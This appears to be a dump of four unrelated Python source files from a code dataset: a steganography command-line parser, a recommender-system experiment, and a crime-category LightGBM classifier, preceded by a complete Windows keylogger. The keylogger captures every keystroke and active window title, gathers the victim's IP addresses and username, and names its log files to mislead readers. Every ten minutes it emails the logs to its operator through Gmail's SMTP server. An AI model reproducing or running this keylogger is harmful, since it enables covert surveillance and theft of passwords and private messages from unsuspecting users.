text stringlengths 957 885k |
|---|
<gh_stars>0
"""
ADVANCED KEYBOARD AND MOUSE-CLICK LOGGING PROGRAM
by <NAME>
1/26/2019
Required Modules: Pywin32, Requests, Pynput
"""
from pynput.keyboard import Key, Listener
import os
import random
import requests
import smtplib
import socket
import threading
import time
import win32gui
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import config # Config file with your email info and password
# --- One-time startup: collect host identifiers for the log header. ---
# NOTE(review): this file is keystroke-logging (spyware-style) software.
# It must only ever be run on machines whose owners have given explicit,
# informed consent; deploying it otherwise is illegal in most jurisdictions.
publicIP = requests.get('https://api.ipify.org').text   # external echo service returns our public IP
privateIP = socket.gethostbyname(socket.gethostname())  # LAN address of this host
test = os.path.expanduser('~')                          # NOTE(review): unused variable
user = os.path.expanduser('~').split('\\')[2]           # Windows username from C:\Users\<name>
datetime = time.ctime(time.time())  # NOTE(review): shadows the stdlib `datetime` module name; fixed at import time
msg = f'[START OF LOGS]\nDate/Time: {datetime}\nUser-Profile: {user}\nPublic-IP: {publicIP}\nPrivate-IP: {privateIP}\n\n'
log = []             # accumulated keystroke/app-change entries; element 0 is the header
log.append(msg)
print(log)
old_app = ''         # last foreground-window title seen by on_press()
delete_file = []     # paths of log files written to disk, pending email/cleanup
def on_press(input):
    """pynput key-press callback: log the active window title and the key pressed.

    NOTE(review): the parameter `input` shadows the builtin of the same name;
    kept unchanged for compatibility.
    """
    global old_app
    # Record what application is currently open
    new_app = win32gui.GetWindowText(win32gui.GetForegroundWindow())
    # Add note in logs if the application changes
    if new_app != old_app and new_app != '':
        # NOTE(review): `datetime` is the module-load timestamp, not the current
        # time, so every app-change entry carries the same stamp — confirm intent.
        log.append(f'[{datetime}] ~ {new_app}\n')
        old_app = new_app
    # Substitute input for readability and add it to the log
    sub_list = {'Key.enter': '[ENTER]\n', 'Key.backspace': '[BACKSPACE]', 'Key.space': ' ',
                'Key.alt_l': '[ALT]', 'Key.alt_r': '[ALT]', 'Key.tab': '[TAB]', 'Key.delete': '[DEL]',
                'Key.ctrl_l': '[CTRL]', 'Key.ctrl_r': '[CTRL]', 'Key.left': '[LEFT ARROW]',
                'Key.right': '[RIGHT ARROW]', 'Key.shift': '[SHIFT]', '\\x13': '[CTRL-S]', '\\x17':
                '[CTRL-W]', 'Key.caps_lock': '[CAPS LOCK]', '\\x01': '[CTRL-A]', 'Key.cmd':
                '[WINDOWS KEY]', 'Key.print_screen': '[PRNT SCREEN]', '\\x03': '[CTRL-C]',
                '\\x16': '[CTRL-V]'}
    input = str(input).strip('\'')
    # Special-case the quote character, which str().strip("'") would mangle
    if input == "\"\'\"":
        input = "\'"
    # TODO: add readability substitution for Key.shift_r as well
    if input in sub_list:
        log.append(sub_list[input])
    else:
        log.append(input)
"""
Writes the log file to a random location with the order number of the log
followed by an I (which looks like a 1) and random numbers to confuse possible
readers.
"""
def write_file(count):
    """Dump the accumulated log to disk under a deliberately confusing name.

    :param count: sequence number of this dump; becomes the filename prefix.

    The filename is <count> + '454545' + 8 random digits + '.txt', intended to
    look like meaningless data to a casual reader.  The path is recorded in the
    module-level ``delete_file`` list so send_logs() can attach and remove it.
    """
    # TODO: add separate branches for Linux vs. Windows paths
    x = os.path.expanduser('~') + '\\Documents\\'
    y = os.path.expanduser('~') + '\\Pictures\\'   # currently unused candidate
    z = os.path.expanduser('~') + '\\Music\\'      # currently unused candidate
    list = [x]  # , y, z]  NOTE(review): shadows the builtin `list`
    filepath = list[0]  # random.choice(list)
    filename = str(count) + '454545' + str(random.randint(10000000, 99999999)) + '.txt'
    file = filepath + filename
    delete_file.append(file)
    print(filename)
    with open(file, 'w') as fp:
        fp.write(''.join(log))
def send_logs():
    """Background thread body: periodically dump the log to disk and email it.

    Credentials come from config.py; the mail is sent to the sending address
    itself.  Runs forever; when the log holds only its header entry, it busy-spins.
    """
    count = 0
    fromAddr = config.fromAddr
    fromPswd = config.fromPswd
    toAddr = fromAddr
    while True:
        if len(log) > 1:  # anything captured beyond the header entry?
            # How often the emails are sent (in seconds); 600 s = 10 minutes
            time.sleep(600)
            write_file(count)
            msg = MIMEMultipart()
            msg['From'] = fromAddr
            msg['To'] = toAddr
            msg['Subject'] = f'[{user}] Log:{count}'
            body = 'testing'
            msg.attach(MIMEText(body, 'plain'))
            # NOTE(review): always attaches delete_file[0] — the OLDEST dump —
            # even though write_file() just appended a new one; confirm intent.
            attachment = open(delete_file[0], 'rb')
            filename = delete_file[0].split('\\')[2]
            print(filename)
            email = MIMEBase('application', 'octet-stream')
            email.set_payload((attachment).read())
            encoders.encode_base64(email)
            email.add_header('content-disposition', 'attachment;filename='+str(filename))
            msg.attach(email)
            text = msg.as_string()  # NOTE(review): unused
            print(attachment)
            # Send logs via email
            try:
                server = smtplib.SMTP('smtp.gmail.com', 587)
                server.ehlo()
                server.starttls()  # upgrade the connection to TLS before login
                server.ehlo()
                server.login(fromAddr, fromPswd)
                server.send_message(msg)
                #server.sendmail(fromAddr, toAddr)
                print("fail4")
                attachment.close()
                server.close()
                print("made it")
            except:  # NOTE(review): bare except hides the real SMTP/auth error
                print("\n\nCant get to server")
                print("Cant get to server")
                print("Cant get to server\n\n")
            """# Delete logs
            os.remove(delete_file[0])
            del log[1:]
            del delete_file[0:]"""
            count += 1
        else:
            pass
# Entry point guard: start the mailer thread and block on the key listener.
if __name__=='__main__':
    t1 = threading.Thread(target=send_logs)  # NOTE(review): non-daemon; keeps the process alive
    t1.start()
    with Listener(on_press=on_press) as listener:
        listener.join()  # block forever, dispatching key events to on_press()
|
from argparse import ArgumentParser, RawTextHelpFormatter
from filetype import is_image
from os import path
def _consent(args, output):
if path.exists(args[output]):
args[output] = path.abspath(args[output])
consent_ = input(f"Warning!!! \nThe '{args[output]}' file already exists."
f"\nDo you wish to overwrite?(y/n)[Default=n] ").lower() or 'n'
if consent_ in ['y', 'yes']:
pass
elif consent_ in ['n', 'no']:
print("Exiting...")
exit(0)
else:
print("Invalid option.")
_consent(args, output)
return args
def is_valid_file(arg) -> str:
    """Return the contents of *arg* when it names an existing file, else *arg* itself."""
    if path.isfile(arg):
        with open(arg, 'r') as handle:
            return handle.read()
    return arg
def get_args():
    """Build the encode/decode CLI, parse sys.argv, validate, and return a dict of args.

    Validation: the input image must exist and be a real image; a missing
    password defaults to the input image's basename; existing output paths
    trigger an overwrite-consent prompt via _consent().
    """
    # NOTE(review): the -t help text below says '@' prefixes a file path, but
    # fromfile_prefix_chars is '_' — confirm which prefix is intended.
    my_args = ArgumentParser(fromfile_prefix_chars='_',
                             description="Hide/extract messages from an image using LSB encoding.\n"
                                         "(LSB = Least Significant Bit)",
                             # usage="python lsb.py [-h] en|de ...",
                             formatter_class=RawTextHelpFormatter,
                             epilog="Made by [shankar12789](https://github.com/shankar12789)")
    # `version_info` is a module-level constant defined after this function.
    my_args.version = version_info
    my_args.add_argument('-v', '--version',
                         action='version')
    action = my_args.add_subparsers(title="Action",
                                    dest='action',
                                    required=True,
                                    metavar="encode|decode",
                                    help="Choose one of the two operation.")
    encode = action.add_parser(name='encode',
                               aliases=['en'],
                               help='Do encoding operation.\nFor more info: "python %(prog)s encode -h"',
                               formatter_class=RawTextHelpFormatter,
                               description="Encode a MESSAGE inside an IMAGE.\nSupported Image Formats: "
                                           "'CMYK', 'HSV', 'LAB', 'RGB', 'RGBA', 'RGBX', 'YCbCr'."
                                           "\nAny other format will result in error.",
                               epilog="Made by [shankar12789](https://github.com/shankar12789)")
    en_required = encode.add_argument_group("Required")
    en_required.add_argument('-i', '--input',
                             action='store',
                             type=str,
                             required=True,
                             metavar='IP_IMAGE',
                             help="Path of the IP_IMAGE into which the MESSAGE will be encoded."
                                  "\nNote: Has been tested with PNG images only."
                                  "\nOther extensions are NOT TESTED and may produce errors.")
    en_required.add_argument('-t', '--text',
                             action='store',
                             # is_valid_file() reads the file when given a path, else passes the text through
                             type=lambda x: is_valid_file(x),
                             required=True,
                             metavar="MESSAGE|FILE",
                             help='The MESSAGE to be encoded. The MESSAGE can be entered directly within quotes(" ") '
                                  '\nor from a file by appending \'@\' before the path of the FILE.'
                                  '\nEx: -t @/home/USER/Desktop/sample.txt'
                                  '\nNote: 1. Only full path and relative path are supported.'
                                  '\n 2. "~" and other environment variables are not resolved.'
                                  '\n 3. MESSAGE can be anything as long as their size is less than the IMAGE '
                                  '\n itself,including the PASSWORD.')
    en_optional = encode.add_argument_group("Optional")
    en_optional.add_argument('-p', '--passwd',
                             action='store',
                             type=str,
                             metavar="PASSWORD",
                             help="The PASSWORD to encode your message. Default: IP_IMAGE name."
                                  "\nNote: 1. For maximum security generate a random string of minimum 8 characters."
                                  "\n 2. There is no password recovery method. "
                                  "\n So, be sure to store your password.")
    en_optional.add_argument('-o', '--output',
                             action='store',
                             type=str,
                             metavar='OP_IMAGE',
                             dest="op_image",
                             help="Name of the resultant OP_IMAGE file. Default: \"encoded.png\"")
    decode = action.add_parser('decode',
                               aliases=['de'],
                               help='Do decoding operation. \nFor more info: "python %(prog)s decode -h"',
                               formatter_class=RawTextHelpFormatter,
                               description="Decode a MESSAGE from an IMAGE (if it exists).",
                               epilog="Made by [shankar12789](https://github.com/shankar12789)")
    de_required = decode.add_argument_group("Required")
    de_required.add_argument('-i', '--input',
                             action='store',
                             type=str,
                             required=True,
                             metavar="IP_IMAGE",
                             help="Path of the IP_IMAGE to be decoded.")
    de_required.add_argument('-p', '--passwd',
                             action='store',
                             type=str,
                             required=True,
                             metavar="PASSWORD",
                             help="The PASSWORD to decode the MESSAGE. "
                                  "\nDefault: The original name of the IMAGE before Encoding.")
    de_optional = decode.add_argument_group("Optional")
    de_optional.add_argument('-o', '--output',
                             action='store',
                             type=str,
                             metavar="FILE",
                             dest="op_text",
                             help="The path of the FILE where the decoded MESSAGE will be written to. "
                                  "\nDefault: The terminal itself")
    args = my_args.parse_args()
    args = vars(args)
    # is_image() comes from the third-party `filetype` package.
    if not (path.exists(args['input']) and is_image(args['input'])):
        print(f"{args['input']} doesn't exist or unsupported.")
        exit(1)
    if args['passwd'] is None:
        args['passwd'] = path.basename(args['input'])
    # 'op_image' is only present for the encode subcommand.
    if 'op_image' in args:
        if args['op_image'] is None:
            args['op_image'] = path.join(path.curdir, 'outputs', 'encoded.png')
        return _consent(args, 'op_image')
    if 'op_text' in args and args['op_text'] is not None and path.exists(args['op_text']):
        return _consent(args, 'op_text')
    return args
# CLI version string, served by the -v/--version flag in get_args().
version_info = '1.0.5'
if __name__ == '__main__':
    print(get_args())
|
from recogym import env_1_args
from models.models_organic_bandit import RecoModelRTAEWithBanditTF, RecoModelRTAEWithBanditTF_Full
from models.models_organic import RecoModelRTAE, RecoModelItemKNN
from models.liang_multivae import MultiVAE
from recogym.agents import organic_user_count_args
from recogym.agents import RandomAgent, random_args
from models.models_bandit import PyTorchMLRAgent, pytorch_mlr_args
from models.model_based_agents import ModelBasedAgent
from utils.utils_agents import eval_against_session_pop, first_element
import tensorflow as tf
import pandas as pd
import argparse
if __name__ == "__main__":
    # NOTE(review): loop nesting below is reconstructed from a whitespace-
    # stripped dump of this script — confirm against the original file.
    parser = argparse.ArgumentParser()
    parser.add_argument('--algorithm', type=str, default='rt/ae', help='algorithm path.')
    parser.add_argument('--batch_size', type=int, default=1024, help='batch size.')
    parser.add_argument('--lr', type=float, default=0.000001, help='Initial learning rate.')
    parser.add_argument('--K', type=int, default=10, help='K.')
    parser.add_argument('--rcatk', type=int, default=5, help='recall at')
    parser.add_argument('--P', type=int, default=20, help='Threshold products at this value Yoochoose.')
    parser.add_argument('--cudavis', type=str, default=None, help='restrict gpu usage')
    parser.add_argument('--units', type=list, default=None, help='ae units')
    parser.add_argument('--batch_size_test', type=int, default=5, help='batch size.')
    parser.add_argument('--reg_Psi', type=float, default=0.1, help='reg.')
    parser.add_argument('--reg_shift', type=float, default=0.0, help='reg.')
    parser.add_argument('--reg_rho', type=float, default=1, help='reg.')
    parser.add_argument('--test_freq', type=int, default=1, help='how often to do test set eval on tb')
    parser.add_argument('--neg_samples', type=int, default=1, help='')
    parser.add_argument('--num_sessions', type=int, default=100, help='')
    parser.add_argument('--num_sessions_organic', type=int, default=0, help='')
    parser.add_argument('--num_users_to_score', type=int, default=100, help='')
    parser.add_argument('--organic_epochs', type=int, default=10, help='')
    parser.add_argument('--bandit_epochs', type=int, default=10, help='')
    args = parser.parse_args()
    # dict_args is shared and mutated before every model run below.
    dict_args = vars(args)
    num_sessions = args.num_sessions
    num_sessions_organic = args.num_sessions_organic
    sig_omega = 0.
    P = args.P
    dict_args['P'] = P
    r = []  # accumulates one results DataFrame per (rep, num_flips) configuration
    results_path = 'results/'
    num_users_to_score = args.num_users_to_score
    seed = 0
    latent_factor = 10
    num_organic_users_to_train = 0  # NOTE(review): unused below
    eval_fn = eval_against_session_pop
    log_eps = 0.3  # passed through to every eval_fn call
    for rep in range(1, 20):
        for num_flips in [0, int(P/2)]:
            res = []
            # Organic LVM
            dict_args['lr'] = 0.0001
            dict_args['num_epochs'] = args.organic_epochs
            dict_args['use_em'] = False
            dict_args['organic'] = True
            dict_args['weight_path'] = 'weights/linAE'
            parameters = {
                'recomodel': RecoModelRTAE,
                'modelargs': dict_args,
                'num_products': P,
                'K': args.K
            }
            sc_lvm = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, parameters, str(parameters['recomodel']), True)
            sc_lvm = first_element(sc_lvm, 'LVM')
            res.append(sc_lvm)
            # LVM Bandit
            dict_args['lr'] = 0.001
            dict_args['num_epochs'] = args.organic_epochs
            dict_args['num_epochs_bandit'] = args.bandit_epochs
            dict_args['use_em'] = False
            dict_args['organic'] = False
            dict_args['norm'] = True
            dict_args['organic_weights'] = 'weights/linAE'
            dict_args['wa_m'] = -1.0
            dict_args['wb_m'] = -6.0
            dict_args['wc_m'] = -4.5
            dict_args['wa_s'] = 1.
            dict_args['wb_s'] = 1.
            dict_args['wc_s'] = 10.
            dict_args['kappa_s'] = 0.01
            parameters = {
                'recomodel': RecoModelRTAEWithBanditTF,
                'modelargs': dict_args,
                'num_products': P,
                'K': args.K,
            }
            # Reuse TF variables across repeated model constructions (TF1-style API)
            with tf.variable_scope('', reuse=tf.AUTO_REUSE):
                sc_bandit = eval_fn(P, num_sessions_organic, num_sessions,
                                    num_users_to_score, seed, latent_factor,
                                    num_flips, log_eps, sig_omega, ModelBasedAgent,
                                    parameters, str(parameters['recomodel']), True)
            sc_bandit = first_element(sc_bandit, 'LVM Bandit MVN-Q')
            res.append(sc_bandit)
            # LVM Bandit Gaussian instead of Matrix normal posterior
            dict_args['lr'] = 0.001
            dict_args['num_epochs'] = args.organic_epochs
            dict_args['num_epochs_bandit'] = args.bandit_epochs
            dict_args['use_em'] = False
            dict_args['organic'] = False
            dict_args['norm'] = True
            dict_args['organic_weights'] = 'weights/linAE'
            dict_args['wa_m'] = -1.0
            dict_args['wb_m'] = -6.0
            dict_args['wc_m'] = -4.5
            dict_args['wa_s'] = 1.
            dict_args['wb_s'] = 1.
            dict_args['wc_s'] = 10.
            dict_args['kappa_s'] = 0.01
            parameters = {
                'recomodel': RecoModelRTAEWithBanditTF_Full,
                'modelargs': dict_args,
                'num_products': P,
                'K': args.K,
            }
            with tf.variable_scope('', reuse=tf.AUTO_REUSE):
                sc_bandit = eval_fn(P, num_sessions_organic, num_sessions,
                                    num_users_to_score, seed, latent_factor,
                                    num_flips, log_eps, sig_omega, ModelBasedAgent,
                                    parameters, str(parameters['recomodel']), True)
            sc_bandit = first_element(sc_bandit, 'LVM Bandit NQ')
            res.append(sc_bandit)
            # CB (contextual bandit baseline)
            pytorch_mlr_args['n_epochs'] = args.bandit_epochs
            pytorch_mlr_args['learning_rate'] = 0.01
            pytorch_mlr_args['ll_IPS'] = False
            pytorch_mlr_args['alpha'] = 0.0
            pytorch_mlr_args['num_products'] = P
            sc_log_reg = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, PyTorchMLRAgent, pytorch_mlr_args, str(pytorch_mlr_args), True)
            sc_log_reg = first_element(sc_log_reg, 'CB')
            res.append(sc_log_reg)
            # log reg baseline (same MLR agent, alpha = 1.0)
            pytorch_mlr_args['n_epochs'] = args.bandit_epochs
            pytorch_mlr_args['learning_rate'] = 0.01
            pytorch_mlr_args['ll_IPS'] = False
            pytorch_mlr_args['alpha'] = 1.0
            pytorch_mlr_args['num_products'] = P
            sc_log_reg = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, PyTorchMLRAgent, pytorch_mlr_args, str(pytorch_mlr_args), True)
            sc_log_reg = first_element(sc_log_reg, 'log reg')
            res.append(sc_log_reg)
            # Random baseline
            random_args['P'] = P
            parameters = {
                **organic_user_count_args,
                **env_1_args,
                'select_randomly': True,
                'modelargs': random_args,
            }
            sc_rand = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, RandomAgent, parameters, 'randomagent', True)
            sc_rand = first_element(sc_rand, 'random')
            res.append(sc_rand)
            # mean ItemKNN
            dict_args['organic'] = True
            parameters = {
                'recomodel': RecoModelItemKNN,
                'modelargs': dict_args,
                'num_products': P,
                'K': 10}
            sc_itemknn = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, parameters, str(parameters['recomodel']), True)
            sc_itemknn['model'] = 'ItemKNN_mean'
            sc_itemknn = first_element(sc_itemknn, 'ItemKNN_mean')
            res.append(sc_itemknn)
            # Liang MultiVAE
            model_based_agent_args = {}
            model_based_agent_args['num_products'] = P
            model_based_agent_args['P'] = P
            model_based_agent_args['lam'] = 0.01
            model_based_agent_args['lr'] = 1e-3
            model_based_agent_args['random_seed'] = 98765
            model_based_agent_args['p_dims'] = [10, P]
            model_based_agent_args['q_dims'] = None
            model_based_agent_args['num_epochs'] = args.organic_epochs
            model_based_agent_args['batch_size'] = args.batch_size
            model_based_agent_args['organic'] = True
            # the total number of gradient updates for annealing
            model_based_agent_args['total_anneal_steps'] = 200000
            # largest annealing parameter
            model_based_agent_args['anneal_cap'] = 0.2
            lvm_parameters = {
                'recomodel': MultiVAE,
                'modelargs': model_based_agent_args,
                'num_products': P,
                'K': 10,
            }
            with tf.variable_scope('', reuse=tf.AUTO_REUSE):
                sc_mult = eval_fn(P, num_sessions_organic, num_sessions, num_users_to_score, seed, latent_factor, num_flips, log_eps, sig_omega, ModelBasedAgent, lvm_parameters, str(lvm_parameters['recomodel']), True)
            sc_mult = first_element(sc_mult, 'MultiVAE')
            res.append(sc_mult)
            # Tag this configuration's results and checkpoint everything so far
            results = pd.concat(res)
            results['seed'] = seed
            results['flips'] = num_flips
            results['logging'] = str(eval_fn).replace('<function ', '').split(' at')[0].replace('eval_against_', '')
            results['rep'] = str(rep)
            r.append(results)
            pd.concat(r).to_csv(results_path + 'interim_results.csv')
            print('saving')
            print(pd.concat(r))
        # Per-repetition checkpoint
        pd.concat(r).to_csv(results_path + 'interim_results_%d.csv' % rep)
        print(pd.concat(r))
    pd.concat(r).to_csv(results_path + 'final_results.csv')
|
<reponame>TiRoX/bi2018<filename>BI/0807_BI_GBDT.py
# -*- coding: utf-8 -*-
'''
@author: TheUniverse
'''
#Module importieren
import pandas as pd
import scipy.stats as stats
import lightgbm
import os
import numpy as np
from sklearn import preprocessing
from sklearn.preprocessing import LabelEncoder
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
os.environ["PATH"] += os.pathsep + 'H:/workspace coding/graphviz/bin'
'''
Hi, my name is Kevin. If you're reading this, you're probably reading it on your screen~
graphviz:
https://stackoverflow.com/questions/35064304/runtimeerror-make-sure-the-graphviz-executables-are-on-your-systems-path-aft
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Windows key --> edit system environment variables
https://imgur.com/a/tZHiAlb
'''
class DataHandler:
    """Holds the SF-crime train/test DataFrames and turns them into model-ready splits."""

    # Kept for backward compatibility; __init__ shadows these per instance.
    training_data = None
    testing_data = None
    # Maps the raw 'Category' label to a dense integer class id.
    category_mapping = {"ARSON": 0,
                        "ASSAULT": 1,
                        "BAD CHECKS": 2,
                        "BRIBERY": 3,
                        "BURGLARY": 4,
                        "DISORDERLY CONDUCT": 5,
                        "DRIVING UNDER THE INFLUENCE": 6,
                        "DRUG/NARCOTIC": 7,
                        "DRUNKENNESS": 8,
                        "EMBEZZLEMENT": 9,
                        "EXTORTION": 10,
                        "FAMILY OFFENSES": 11,
                        "FORGERY/COUNTERFEITING": 12,
                        "FRAUD": 13,
                        "GAMBLING": 14,
                        "KIDNAPPING": 15,
                        "LARCENY/THEFT": 16,
                        "LIQUOR LAWS": 17,
                        "LOITERING": 18,
                        "MISSING PERSON": 19,
                        "NON-CRIMINAL": 20,
                        "OTHER OFFENSES": 21,
                        "PORNOGRAPHY/OBSCENE MAT": 22,
                        "PROSTITUTION": 23,
                        "RECOVERED VEHICLE": 24,
                        "ROBBERY": 25,
                        "RUNAWAY": 26,
                        "SECONDARY CODES": 27,
                        "SEX OFFENSES FORCIBLE": 28,
                        "SEX OFFENSES NON FORCIBLE": 29,
                        "STOLEN PROPERTY": 30,
                        "SUICIDE": 31,
                        "SUSPICIOUS OCC": 32,
                        "TREA": 33,
                        "TRESPASS": 34,
                        "VANDALISM": 35,
                        "VEHICLE THEFT": 36,
                        "WARRANTS": 37,
                        "WEAPON LAWS": 38}

    def __init__(self):
        self.training_data = None
        self.testing_data = None

    def load_data(self, train, test):
        """Store the already-read train/test DataFrames on the instance."""
        self.training_data = train
        self.testing_data = test

    def transform_data(self, with_mask=1):
        """Preprocess features and return train/validation/test splits as a dict.

        Builds one combined frame (so encoders/scalers see train AND test),
        label-encodes categoricals, scales coordinates, then splits 70/30.

        :param with_mask: when < 1, fraction of training rows to keep (random subsample).
        :return: dict with keys x_train_split, y_train_split, x_test_split,
                 y_test_split, test_x.
        """
        features_columns = ['Year', 'Month', 'Hour', 'PdDistrict', 'X', 'Y']  # ['Year', 'Month', 'Day', 'Time', 'DayOfWeek', 'PdDistrict', 'X', 'Y']
        # Fix: DataFrame.append was removed in pandas 2.0 — use pd.concat instead.
        big_data = pd.concat([self.training_data[features_columns],
                              self.testing_data[features_columns]])
        categorical_features = ['Year', 'Month', 'Hour', 'PdDistrict']
        numerical_features = ['X', 'Y']
        print('Encoding the categorical features')
        big_data = self.categorical_encoder(big_data, categorical_features)
        print('Scaling longitude and latitude')
        big_data = self.features_preprocessing(big_data, numerical_features)
        # Split the combined frame back into train rows and test rows.
        train_X = big_data[0:self.training_data.shape[0]]
        train_Y = self.training_data['Category'].map(self.category_mapping)
        test_x = big_data[self.training_data.shape[0]::]
        if with_mask != 1:
            mask = np.random.rand(len(self.training_data)) < with_mask
            train_X = train_X[mask]
            train_Y = train_Y[mask]
        print('Splitting the data set for validation during model building')
        x_train_split, x_test_split, y_train_split, y_test_split = train_test_split(
            train_X, train_Y, test_size=0.3, random_state=42)
        return {'x_train_split': x_train_split, 'y_train_split': y_train_split,
                'x_test_split': x_test_split, 'y_test_split': y_test_split, 'test_x': test_x}

    def features_preprocessing(self, data, numerical_columns):
        """Standard-scale each numerical column in place and return the frame."""
        for num_col in numerical_columns:
            data[num_col] = preprocessing.scale(data[num_col])
        return data

    def categorical_encoder(self, data, categorical_columns):
        """Label-encode each categorical column in place and return the frame."""
        le = LabelEncoder()
        for cat_col in categorical_columns:
            data[cat_col] = le.fit_transform(data[cat_col])
        return data
def main():
    """Entry point: read the CSVs, preprocess them, train the GBDT, and exit."""
    train_df = readF("train.csv", True)   # True: the file carries its own index column
    test_df = readF('test.csv', False)
    handler = DataHandler()
    handler.load_data(train=train_df, test=test_df)
    data_sets = handler.transform_data()
    training_result = lgbm(data_sets)
    print(training_result)
    exit()
def readF(path, index):
    """Read a crime CSV and derive time/season features, dropping bad coordinates.

    :param path: CSV file path; 'train.csv' additionally loses its
                 Descript/Resolution columns.
    :param index: True when the file has no index column to consume (train.csv);
                  False makes pandas treat column 0 as the index (test.csv).
    :return: preprocessed DataFrame.
    """
    print('Reading: ', path)
    # NOTE(review): error_bad_lines was removed in pandas 2.0 (use on_bad_lines='skip');
    # kept here because the project pins an older pandas — confirm before upgrading.
    if index == True:
        df = pd.read_csv(path, delimiter=',', quotechar='"', header=0, error_bad_lines=False,
                         dtype={"AddressSuffix": str, 'X': float, 'Y': float})
    else:
        df = pd.read_csv(path, delimiter=',', quotechar='"', header=0, error_bad_lines=False,
                         dtype={"AddressSuffix": str, 'X': float, 'Y': float}, index_col=0)
    print('Transforming', path)
    # Slice the fixed-format 'Dates' string (YYYY-MM-DD HH:MM:SS) into parts.
    df['Year'] = df['Dates'].str[:4]
    df['Month'] = df['Dates'].str[5:7]
    df['Day'] = df['Dates'].str[8:10]
    df['Hour'] = df['Dates'].str[11:13]
    df['Season'] = df.apply(get_season, axis=1)
    df['DayOfWeek'] = df['DayOfWeek'].str.upper()
    # Zero out coordinates outside San Francisco's bounding box
    # (outliers distort the chi-square evaluation).
    #df['X'] = df['X'].apply(lambda x: 0 if float(x)>=-122.3649 or float(x)<=-122.5136 else x)#
    df['X'] = df['X'].apply(lambda x: 0 if float(x) > -122.3649 or float(x) < -122.513642064265 else x)
    df['Y'] = df['Y'].apply(lambda y: 0 if float(y) < 37.70788 or float(y) > 37.81998 else y)
    # Delete all records whose coordinates were invalidated above.
    df = df[df.X != 0]
    df = df[df.Y != 0]
    # Fix: drop()'s positional axis argument was deprecated and removed in
    # pandas 2.0 — use the axis keyword.  The pd.option_context wrapper the
    # original put around these drops only affected display options, not the
    # drops themselves, so it is removed as dead code.
    df = df.drop('Dates', axis=1)
    df = df.drop('Address', axis=1)
    if path == 'train.csv':
        df = df.drop('Descript', axis=1)
        df = df.drop('Resolution', axis=1)
    print('Success for ', path)
    return df
def get_season(row):
    """Map the month embedded in row['Dates'] (characters 5:7) to a season name."""
    month = int(row['Dates'][5:7])
    if month in (3, 4, 5):
        return "SPRING"
    if month in (6, 7, 8):
        return "SUMMER"
    if month in (9, 10, 11):
        return "AUTUMN"
    return "WINTER"
"""
Feature Extraction
Feature Extraction mit ChiSquare Test, welcher Wert nimmt am meisten Einfluß wenn Null Hypothese gilt
Chi-Square Erklärung 5-min YouTube: https://www.youtube.com/watch?v=VskmMgXmkMQ ;; Besser: https://www.youtube.com/watch?v=WXPBoFDqNVk (12 min)
Quelle: http://www.handsonmachinelearning.com/blog/2AeuRL/chi-square-feature-selection-in-python
"""
class ChiSquare:
    """Chi-square independence test between a feature column and a target column.

    If P is low, the null hypothesis (independence) is rejected and the feature
    is considered important for prediction.
    """

    def __init__(self, dataframe):
        self.df = dataframe
        self.p = None            # p-value of the last test
        self.chi2 = None         # chi-square test statistic of the last test
        self.dof = None          # degrees of freedom
        self.dfTabular = None    # kept for backward compatibility (unused)
        # Fix: dfObserved is assigned in TestIndependence but was never
        # declared here, unlike its sibling attributes.
        self.dfObserved = None
        self.dfExpected = None

    def _print_chisquare_result(self, colX, alpha):
        """Print whether colX is an important predictor at significance level alpha."""
        # If P is low, H0 (the null hypothesis) must go — alpha is the cut-off.
        if self.p < alpha:
            result = "{} is IMPORTANT for Prediction. Value of chi2 {}".format(colX, self.chi2)
        else:
            result = "{} is NOT an important predictor. Value of chi2 {}".format(colX, self.chi2)
        print(result)

    def TestIndependence(self, colX, colY, alpha=0.1):
        """Run the chi-square test of independence between columns colX and colY.

        Stores p, chi2, dof, dfObserved and dfExpected on the instance and
        prints the verdict.
        """
        X = self.df[colX].astype(str)
        Y = self.df[colY].astype(str)
        self.dfObserved = pd.crosstab(Y, X)
        chi2, p, dof, expected = stats.chi2_contingency(self.dfObserved.values)
        self.p = p
        self.chi2 = chi2
        self.dof = dof
        self.dfExpected = pd.DataFrame(expected, columns=self.dfObserved.columns,
                                       index=self.dfObserved.index)
        self._print_chisquare_result(colX, alpha)
# Feature selection
def useChi(cT):
    """Run the chi-square independence test of every candidate feature against 'Category'."""
    candidate_columns = ['Year', 'Month', 'Hour', 'PdDistrict', 'X', 'Y']  # ['Year', 'Month', 'Day', 'Time', 'DayOfWeek', 'PdDistrict', 'X', 'Y']
    for column in candidate_columns:
        # Test each column against the dependent 'Category' feature
        cT.TestIndependence(colX=column, colY="Category")
def lgbm(data_set):
    """Train a LightGBM multiclass classifier on the preprocessed splits and plot trees.

    :param data_set: dict produced by DataHandler.transform_data().
    :return: None — results are printed/plotted; predictions are discarded.
    """
    # Source -> https://github.com/Microsoft/LightGBM/blob/master/tests/python_package_test/test_sklearn.py
    print ('Aufteilen des Datensatzes nach Feature Preprocessing')
    x_train_split_t = data_set['x_train_split']
    y_train_split_t = data_set['y_train_split']
    # Separate held-out split for evaluation (skipping this was one of our big earlier mistakes)
    x_test_split_t = data_set['x_test_split']
    y_test_split_t = data_set['y_test_split']
    test_x = data_set['test_x']
    print ('setup training and eval')
    # NOTE(review): these Dataset objects are built but never passed to the
    # sklearn-style classifier below — confirm whether they are still needed.
    lgb_train = lightgbm.Dataset(x_train_split_t, y_train_split_t)
    lgb_eval = lightgbm.Dataset(test_x, reference=lgb_train)
    print ('trying to perform GBDT')
    clf = lightgbm.LGBMClassifier(boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=127, subsample_for_bin=200000, objective='multiclass', silent=False )
    clf.fit(x_train_split_t, y_train_split_t, eval_set=[(x_test_split_t, y_test_split_t)])
    with pd.option_context('display.max_rows', 11, 'display.max_columns', 200):
        clf.predict(test_x)  # NOTE(review): prediction result is discarded
        #print(y_pred)
